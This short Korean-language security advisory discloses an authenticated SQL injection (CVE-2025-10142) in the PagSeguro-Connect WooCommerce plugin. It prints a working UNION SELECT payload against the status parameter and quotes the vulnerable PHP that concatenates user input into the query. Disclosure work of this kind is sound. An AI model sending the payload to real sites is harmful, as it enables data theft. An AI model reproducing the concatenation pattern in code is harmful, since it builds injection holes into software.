
CVE-2025-10142에 대한 공개
CVE-2025-10142 공개
이 저장소는 Ricardo Martins가 개발한 WordPress 플러그인 PagSeguro-Connect-para-WooCommerce <= 4.44.3에서 발견된 취약점을 공개합니다.
| CVE ID | 유형 | 구성 요소 | 영향 |
|---|---|---|---|
| CVE-2025-10142 | 인증된 (Shop Manager+) SQL Injection | src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.php | 인증된 공격자가 데이터를 유출할 수 있음 |
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -
status 매개변수는 이스케이프 처리나 $wpdb->prepare() 사용 없이 SQL 쿼리에 직접 연결됩니다.
if (!empty($_REQUEST['status'])) {
$status = sanitize_text_field(wp_unslash($_REQUEST['status']));
$where .= " AND status = '$status'";
}
$this->items = $wpdb->get_results(
$wpdb->prepare(
"SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY $orderby $order LIMIT %d OFFSET %d",
$per_page,
($current_page - 1) * $per_page
),
ARRAY_A
);
...
Shop Manager로부터 공격이 가능하므로 위협은 상당히 낮습니다. 외부 입력을 $where에 넣고, 그 $where를 그대로 SQL 구문에 사용하는 처리를 따라가는 것이 조금 힘들었습니다.
이름: MooseLove
역할: 독립 보안 연구원 / 버그 헌터
연락처: 요청 시 제공 가능
이 권고는 공공 보안 인식 제고를 위해 제공됩니다. 출처를 밝히면 자유롭게 공유할 수 있습니다.